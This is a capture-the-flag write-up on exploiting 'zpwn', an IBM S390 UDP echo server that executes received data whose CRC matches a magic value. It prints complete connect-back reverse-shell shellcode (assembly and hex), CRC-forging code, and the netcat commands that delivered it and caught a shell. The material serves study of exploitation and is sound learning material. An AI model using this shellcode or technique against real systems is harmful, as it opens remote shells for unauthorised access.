Intro
The task was solved by jagger and mak, both members of Dragon Sector.
It's a typical example of the 'pwn' category. You can download the server-side binary here.
$ file zpwn
zpwn: ELF 64-bit MSB executable, IBM S/390, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.4, BuildID[sha1]=0xe1d81c88df9d4f618417bd2ebd037ea74dd1da97, stripped
The emulator
So, it's an S390/Linux binary. The S390 is a CPU arch created for the IBM System Z machines. Our team's funds were not enough to buy a real IBM System Z :) so we had to use an emulator. And the only viable option at the time was Hercules. After installing the hercules package (it comes with Ubuntu) we also had to install some Linux OS flavor, and we chose Debian 7.4 (for s390x), even though the original binary seemed to be compiled under SUSE (it left some SUSE-specific sections in the zpwn ELF). If you're interested in how to get your own Debian on IBM System Z, please take a look at this excellent step-by-step guide. The configuration and installation process is slow & painful, but once we had the emulator running we thought that we were ready to go...
... but not so fast. The kernel that comes with Debian 7.4 (3.2.something) had a nasty bug in the kernel-mode ptrace() implementation, which prevented it from being used with gdb: it threw a few errors and exited when saving the registers of the traced process. So, we had to upgrade the kernel with the newest .deb we could find on ze Internets (from one of the newer Debian builds), which was one of the 3.12 releases.
Figure: The Hercules s390x emulator
Recon
A quick objdump over the binary tells us that it's essentially an echo server, which loops constantly, performing recvfrom(fd, buf, &len, &from) and sendto(fd, buf, len, &from)... but not only that. There's this peculiar procedure which computes some sort of hash/CRC over the data sent to the UDP socket (it's an unconnected one, which is important). And, in case this CRC equals some predefined value, it jumps directly into the buffer, mmap'd previously with PROT_READ|PROT_WRITE|PROT_EXEC permission bits. At this point, we started to understand how to obtain RCE. The following disassembly shows the data receiving and hash/CRC computing procedures dumped from the zpwn binary.
- ; recvfrom data from the UDP socket into the RWE buffer (address in %r11)
- 80000b42: c0 e5 ff ff fe 51 brasl %r14,800007e4 <recvfrom@plt>
- .../* error checking */
- ; move the RWE mmap'd buffer address to %r5
- 80000b54: b9 04 00 5b lgr %r5,%r11
- ; init %r2 with -1
- 80000b58: a7 28 ff ff lhi %r2,-1
- ; copy number of chars in the buffer to %r3
- 80000b5c: b9 04 00 34 lgr %r3,%r4
- ; loop until %r3 == 0 (condition at 0x80000b7c)
- ; load character from buf[index] to %r1
- 80000b60: 43 10 50 00 ic %r1,0(%r5)
- ; increment %r5 - now it points to the next char
- 80000b64: 41 50 50 01 la %r5,1(%r5)
- ; compute CRC/HASH - XORs and SHIFTs mostly
- 80000b68: 17 12 xr %r1,%r2
- 80000b6a: 88 20 00 08 srl %r2,8
- 80000b6e: b9 84 00 11 llgcr %r1,%r1
- 80000b72: eb 11 00 02 00 0d sllg %r1,%r1,2
- 80000b78: 57 21 c0 00 x %r2,0(%r1,%r12)
- 80000b7c: a7 37 ff f2 brctg %r3,80000b60
- ; if %r2 == -201528 jump to 0x80000bae
- 80000b80: c2 2d ff fc ec c8 cfi %r2,-201528
- 80000b86: a7 84 00 14 je 80000bae
- ....
- ; Jump directly to the buffer holding our data (%r11)
- 80000bae: 0d eb basr %r14,%r11
So, in order to get RCE, we had to provide our shell-code as the UDP echo packet, and make sure that the CRC computed over it equals -201528 (0xfffcecc8). The hash is only 32 bits in size, so it should be trivial to brute-force. But we had to develop our shell-code first.
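The check described above can be modelled in plain C. This is only a sketch under one loud assumption: that the 1kB table addressed by %r12 is the standard reflected CRC-32 table (polynomial 0xEDB88320). The first and last entries of the table excerpt shown in the CRC section match it, but the middle of the dump is elided. The function names zpwn_hash and zpwn_would_jump are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* ASSUMPTION: the table at %r12 is the standard reflected CRC-32 table;
 * only its first and last entries are visible in the write-up. */
static uint32_t crc_table[256];

static void build_table(void)
{
    for (uint32_t n = 0; n < 256; n++) {
        uint32_t c = n;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ 0xEDB88320u : c >> 1;
        crc_table[n] = c;
    }
}

/* Hypothetical helper mirroring the loop at 0x80000b60.
 * Unlike zlib's crc32(), the register is NOT inverted at the end. */
uint32_t zpwn_hash(const uint8_t *buf, size_t len)
{
    uint32_t r2 = 0xFFFFFFFFu;                /* lhi %r2,-1 */

    if (crc_table[1] == 0)
        build_table();
    while (len--) {
        uint32_t r1 = (*buf++ ^ r2) & 0xFFu;  /* ic, la, xr, llgcr */
        r2 = (r2 >> 8) ^ crc_table[r1];       /* srl, sllg, x */
    }
    return r2;
}

/* Nonzero when the server would branch into the received buffer. */
int zpwn_would_jump(const uint8_t *buf, size_t len)
{
    return zpwn_hash(buf, len) == 0xFFFCECC8u; /* cfi %r2,-201528 */
}
```

If the assumption holds, the magic value is simply a regular CRC-32 of 0x00031337 with the final inversion left out (0xfffcecc8 ^ 0xffffffff = 0x00031337).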
Shellcode
So, the echo was performed over an unconnected UDP socket, and we couldn't use it for our nefarious purposes (it'd require too much coding IMO), so we had to develop something that would either bind a socket and listen for our connection, or connect back to our server. The following shellcode implements the latter idea (as it's one syscall less to code).
Pseudocode
- s = socket(AF_INET, SOCK_STREAM, 0);
- connect(s, {IP1.IP2.IP3.IP4/8738}, 16);
- dup2(s, 0);
- dup2(s, 1);
- dup2(s, 2);
- execve("/bin/sh", NULL, NULL);
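The second argument of connect() in the pseudocode is a struct sockaddr_in. As a rough sketch, this is how its 16 bytes would sit in memory on big-endian s390x for a given address and port; the helper name fill_sockaddr_in is hypothetical, and ip[0] is assumed to be the first octet of the dotted address.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: lays out a struct sockaddr_in byte by byte,
 * the way it appears in memory on a big-endian machine. */
void fill_sockaddr_in(uint8_t out[16], const uint8_t ip[4], uint16_t port)
{
    memset(out, 0, 16);               /* also clears the sin_zero padding */
    out[0] = 0x00;                    /* sin_family = AF_INET (2), host order */
    out[1] = 0x02;
    out[2] = (uint8_t)(port >> 8);    /* sin_port, network byte order */
    out[3] = (uint8_t)(port & 0xFF);
    memcpy(out + 4, ip, 4);           /* sin_addr, network byte order */
}
```

For port 8738 (0x2222) both port bytes come out as 34, which is why the number is convenient to write one byte at a time.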
I see you're amazed by the quality of the shell-code below :). Well, it had to be implemented without knowing the assembler and its opcodes beforehand, so it's grossly inefficient. Learning a new asm on the go is what haxors like best, no? :) It's also more complicated than it should be, because the network syscalls (socket, connect) are implemented on Linux/s390x via the socketcall() multiplexer, which takes a pointer to an argument block in memory (built on the stack here) instead of taking the args in registers (which would have been considerably faster to implement).
- asm (
- "mvi 0(%r15), 0\n"
- "mvi 1(%r15), 0\n"
- "mvi 2(%r15), 0\n"
- "mvi 3(%r15), 0\n"
- "mvi 4(%r15), 0\n"
- "mvi 5(%r15), 0\n"
- "mvi 6(%r15), 0\n"
- "mvi 7(%r15), 2\n" ; AF_INET
- "mvi 8(%r15), 0\n"
- "mvi 9(%r15), 0\n"
- "mvi 10(%r15), 0\n"
- "mvi 11(%r15), 0\n"
- "mvi 12(%r15), 0\n"
- "mvi 13(%r15), 0\n"
- "mvi 14(%r15), 0\n"
- "mvi 15(%r15), 1\n" ; SOCK_STREAM
- "mvi 16(%r15), 0\n"
- "mvi 17(%r15), 0\n"
- "mvi 18(%r15), 0\n"
- "mvi 19(%r15), 0\n"
- "mvi 20(%r15), 0\n"
- "mvi 21(%r15), 0\n"
- "mvi 22(%r15), 0\n"
- "mvi 23(%r15), 0\n" ; IPPROTO_IP
- "la %r3,0(%r15)\n"
- "la %r2, 1\n"
- "la %r1, 102\n"
- ; socketcall - SYS_SOCKET(AF_INET(2), SOCK_STREAM(1), IPPROTO_IP(0));
- "svc 102\n"
- "lgr %r6, %r2\n"
- "mvi 64(%r15), 0\n"
- "mvi 65(%r15), 2\n" ; AF_INET
- "mvi 66(%r15), 34\n" ; port (8738 = (34*256)+34)
- "mvi 67(%r15), 34\n"
- "mvi 68(%r15), A\n" ; our IP (A.B.C.D, network byte order)
- "mvi 69(%r15), B\n"
- "mvi 70(%r15), C\n"
- "mvi 71(%r15), D\n"
- "stg %r6, 0(%r15)\n"
- "la %r4, 64(%r15)\n"
- "stg %r4, 8(%r15)\n"
- "mvi 16(%r15), 0\n"
- "mvi 17(%r15), 0\n"
- "mvi 18(%r15), 0\n"
- "mvi 19(%r15), 0\n"
- "mvi 20(%r15), 0\n"
- "mvi 21(%r15), 0\n"
- "mvi 22(%r15), 0\n"
- "mvi 23(%r15),16\n" ; sizeof(struct sockaddr_in)
- "la %r3,0(%r15)\n"
- "la %r2, 3\n"
- "la %r1, 102\n"
- ; socketcall - SYS_CONNECT(fd, {AF_INET, "A.B.C.D", "8738"}, 16);
- "svc 102\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,0\n"
- ; dup2(fd, 0);
- "svc 63\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,1\n"
- ; dup2(fd, 1);
- "svc 63\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,2\n"
- ; dup2(fd, 2);
- "svc 63\n"
- "mvi 0(%r15),'/'\n"
- "mvi 1(%r15),'b'\n"
- "mvi 2(%r15),'i'\n"
- "mvi 3(%r15),'n'\n"
- "mvi 4(%r15),'/'\n"
- "mvi 5(%r15),'s'\n"
- "mvi 6(%r15),'h'\n"
- "mvi 7(%r15),0\n"
- "la %r1,11\n"
- "lgr %r2,%r15\n"
- "la %r3,0\n"
- "la %r4,0\n"
- ; execve("/bin/sh", 0, 0);
- "svc 11\n"
- );
In hex it looks like the following (modulo our IP which is represented by IP1..IP4 bytes).
- "\x92\x00\xf0\x00\x92\x00\xf0\x01\x92\x00\xf0\x02\x92\x00\xf0\x03"
- "\x92\x00\xf0\x04\x92\x00\xf0\x05\x92\x00\xf0\x06\x92\x02\xf0\x07"
- "\x92\x00\xf0\x08\x92\x00\xf0\x09\x92\x00\xf0\x0a\x92\x00\xf0\x0b"
- "\x92\x00\xf0\x0c\x92\x00\xf0\x0d\x92\x00\xf0\x0e\x92\x01\xf0\x0f"
- "\x92\x00\xf0\x10\x92\x00\xf0\x11\x92\x00\xf0\x12\x92\x00\xf0\x13"
- "\x92\x00\xf0\x14\x92\x00\xf0\x15\x92\x00\xf0\x16\x92\x00\xf0\x17"
- "\x41\x30\xf0\x00\x41\x20\x00\x01\x41\x10\x00\x66\x0a\x66\xb9\x04"
- "\x00\x62\x92\x00\xf0\x40\x92\x02\xf0\x41\x92\x22\xf0\x42\x92\x22"
- "\xf0\x43\x92\IP1\xf0\x44\x92\IP2\xf0\x45\x92\IP3\xf0\x46\x92\IP4"
- "\xf0\x47\xe3\x60\xf0\x00\x00\x24\x41\x40\xf0\x40\xe3\x40\xf0\x08"
- "\x00\x24\x92\x00\xf0\x10\x92\x00\xf0\x11\x92\x00\xf0\x12\x92\x00"
- "\xf0\x13\x92\x00\xf0\x14\x92\x00\xf0\x15\x92\x00\xf0\x16\x92\x10"
- "\xf0\x17\x41\x30\xf0\x00\x41\x20\x00\x03\x41\x10\x00\x66\x0a\x66"
- "\x41\x10\x00\x3f\xb9\x04\x00\x26\x41\x30\x00\x00\x0a\x3f\x41\x10"
- "\x00\x3f\xb9\x04\x00\x26\x41\x30\x00\x01\x0a\x3f\x41\x10\x00\x3f"
- "\xb9\x04\x00\x26\x41\x30\x00\x02\x0a\x3f\x92\x2f\xf0\x00\x92\x62"
- "\xf0\x01\x92\x69\xf0\x02\x92\x6e\xf0\x03\x92\x2f\xf0\x04\x92\x73"
- "\xf0\x05\x92\x68\xf0\x06\x92\x00\xf0\x07\x41\x10\x00\x0b\xb9\x04"
- "\x00\x2f\x41\x30\x00\x00\x41\x40\x00\x00\x0a\x0b\x6d\x6f\x85\x48"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
You may ask, why so many "A"s at the end of the shell-code? The answer is, that there was some peculiar routing problem between our team's machines and the CTF setup, that prevented delivering UDP packets of sizes between ca. 120 and 520 bytes (tested from a few networking locations), so we had to artificially extend it to >600 bytes. Wicked, we know! But well :)
CRC
Now, we have our shellcode, but the CRC over it will not be the magic value, so let's append 4 bytes of data to it and brute-force them. We need to get 0xfffcecc8 (-201528) in the result register (%r2). As this CRC goes sequentially over the data in the buffer, we can pre-compute the hash state for the original shell-code payload, which makes the whole procedure much quicker (here represented by uint64_t st = 0xffffffff8ec7938c). It's possible to express the loop in pure C, and it's quite easily doable, giving, more or less...
while (%r3--) { %r1 = *input ^ %r2; %r2 = (%r2 >> 8) ^ *(uint32_t *)(0x80000d7c + ((%r1 & 0xff) << 2)); input++; }
... but hackers gonna hack, so we simply replicated the original code with asm inlines:
- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- int main(void) {
- uint64_t st = 0xffffffff8ec7938c; // Initial CRC of our SC
- uint64_t comp;
- uint8_t sc[4];
- uint32_t *p2 = (uint32_t *)sc; // the 4 candidate bytes, viewed as one counter
- // 1kB of data from the zpwn binary, dumped with gdb's
- // "dump binary memory", it's used by the CRC algorithm
- // as a random data table (addr held in %r12)
- uint8_t *tablica = (uint8_t *)
- "\x00\x00\x00\x00\x77\x07\x30\x96\xee\x0e\x61\x2c\x99\x09\x51\xba"
- ......
- "\xb4\x0b\xbe\x37\xc3\x0c\x8e\xa1\x5a\x05\xdf\x1b\x2d\x02\xef\x8d"
- "\x01";
- sc[0] = 0;
- sc[1] = 0;
- sc[2] = 0;
- sc[3] = 0;
- uint64_t cnt = 0;
- for(;;) {
- cnt++;
- (*p2)++; // next 4-byte candidate
- asm(
- " lgr %%r2, %1\n"
- " lgr %%r5, %2\n"
- " lgr %%r12, %3\n"
- " la %%r3, 4\n"
- " la %%r1, 0\n"
- "label1:\n"
- " ic %%r1,0(%%r5)\n"
- " la %%r5,1(%%r5)\n"
- " xr %%r1,%%r2\n"
- " srl %%r2,8\n"
- " .long 0xb9840011\n" /* llgcr %r1, %r1 */
- " sllg %%r1,%%r1,2\n"
- " x %%r2,0(%%r1,%%r12)\n"
- " brctg %%r3,label1\n"
- " lgr %0, %%r2\n"
- : "=r" (comp)
- : "r" (st), "r" (sc), "r" (tablica)
- : "r1", "r2", "r3", "r5", "r12"
- );
- if (comp == 0xfffcecc8 || comp == 0xfffffffffffcecc8) {
- // GOTCHA
- printf("==> %hhx %hhx %hhx %hhx\n", sc[0], sc[1], sc[2], sc[3]);
- printf("==> %x\n", *p2);
- break;
- }
- if ((cnt % 1000000) == 0) {
- printf("CNT: %llu\n", (unsigned long long)cnt);
- }
- }
- return 0;
- }
After the not-so-quick brute-forcing session (~30 min.) using the emulator, we got the last 4 bytes of the payload ("\x42\x82\xe7\xc5") for this specific shell-code.
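In hindsight, the brute-force is not strictly needed. The sketch below computes the 4-byte suffix directly by running the table-driven update backwards from the target register. It rests on the same assumption as before, namely that the dumped table is the standard reflected CRC-32 table (its visible first and last entries match); the names crc_feed and forge_suffix are invented for this example and are not part of our original tooling.

```c
#include <stddef.h>
#include <stdint.h>

/* ASSUMPTION: standard reflected CRC-32 table (polynomial 0xEDB88320). */
static uint32_t crc_table[256];

static void build_table(void)
{
    for (uint32_t n = 0; n < 256; n++) {
        uint32_t c = n;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ 0xEDB88320u : c >> 1;
        crc_table[n] = c;
    }
}

/* Forward update, same steps as the loop in the zpwn binary. */
uint32_t crc_feed(uint32_t reg, const uint8_t *buf, size_t len)
{
    if (crc_table[1] == 0)
        build_table();
    while (len--)
        reg = (reg >> 8) ^ crc_table[(reg ^ *buf++) & 0xFFu];
    return reg;
}

/* Finds the 4 bytes that move the register from `state` to `target`. */
void forge_suffix(uint32_t state, uint32_t target, uint8_t out[4])
{
    uint32_t reg = target;

    if (crc_table[1] == 0)
        build_table();
    /* Undo four updates as if four zero bytes had been fed in. The top
     * byte of every table entry is unique, so it identifies the index. */
    for (int i = 0; i < 4; i++) {
        uint32_t idx = 0;
        while ((crc_table[idx] >> 24) != (reg >> 24))
            idx++;
        reg = ((reg ^ crc_table[idx]) << 8) | idx;
    }
    /* Feeding bytes b0..b3 from `state` equals feeding zeros from
     * state ^ (b0..b3 read as a little-endian word). */
    reg ^= state;
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(reg >> (8 * i));
}
```

Called as forge_suffix(0x8ec7938c, 0xfffcecc8, out), it yields 42 82 e7 c5, the same suffix the brute-forcer found, and it does so in microseconds even under the emulator.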
PWN
Now, let's save the shell-code as a file, append those 4 bytes, and send it using netcat.
# Client
$ cat sc | nc -u <serverip> 31337
# Listen on server for the back-connect
$ nc -l -v 8738
Connection from 109.233.61.11 port 8738 [tcp/*] accepted
id
uid=1000(zpwn) gid=1000(zpwn) groups=1000(zpwn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Voila! Let's grab the flag (from flag.txt) and move over to other tasks.